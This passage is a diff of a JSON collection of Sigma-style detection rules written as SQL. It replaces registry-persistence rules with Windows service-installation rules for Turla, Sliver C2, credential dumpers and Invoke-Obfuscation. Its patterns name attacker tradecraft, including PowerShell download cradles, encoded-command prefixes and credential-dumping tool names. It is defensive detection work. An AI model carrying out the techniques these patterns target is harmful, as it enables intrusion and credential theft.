"title": "Office Application Startup - Office Test", - "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects the addition of office test registry that 
allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", - "author": "omkar72", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1137.002" + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_event_office_test_regadd.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE 
'%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_event_persistence_recycle_bin.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", + "title": "Remote Access Tool Services Have Been Installed - System", + "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", + "status": "experimental", + "description": "Detects service 
installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1543.003", + "attack.t1569.002" ], - "level": "critical", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_service_install_remote_access_software.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + 
"title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", + "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", - "status": "test", - "description": "Detects the addition of a SSP to the registry. 
Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "status": "experimental", + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "status": "experimental", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec 
commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Removal Of SD Value to Hide Schedule Task - Registry", - "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "title": "New PDQDeploy Service - Client Side", + "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", "status": "experimental", - "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. 
This technique is used by Tarrask malware", - "author": "Sittikorn S", + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" ], - "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" + "filename": "win_system_service_install_pdqdeploy_runner.yml" }, { - "title": "Removal of Potential COM Hijacking Registry Keys", - "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", - "status": "test", - "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Anydesk Remote Access Software Service Installation", + "id": "530a6faa-ff3d-4022-b315-50828e77eef5", + "status": "experimental", + "description": "Detects the installation of the anydesk software service. 
Which could be an indication of anydesk abuse if you the software isn't already used.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ - "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" + "Legitimate usage of the anydesk tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\') OR (NewProcessName LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\' AND 
TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" ], - "filename": "registry_delete_removal_com_hijacking_registry_key.yml" + "filename": "win_system_service_install_anydesk.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "title": "Tap Driver Installation", + "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unlikely" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_tap_driver_installation.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": 
"Christian Burkard (Nextron Systems)", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "status": "experimental", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Removal Of Index Value to Hide Schedule Task - Registry", - "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "title": "PAExec Service Installation", + "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. 
Which effectively hides it from any tooling such as \"schtasks /query\"", + "description": "Detects PAExec service installation", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" + "filename": "win_system_service_install_paexec.yml" }, { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. 
This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", - "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", "status": "experimental", - "description": "Detects COM object hijacking via TreatAs subkey", - "author": "Kutepov Anton, oscd.community", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.privilege_escalation", + 
"car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Maybe some system utilities in rare cases use linking keys for backward compatibility" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_com_key_linking.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. 
a renamed Sysinternals tool)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ 
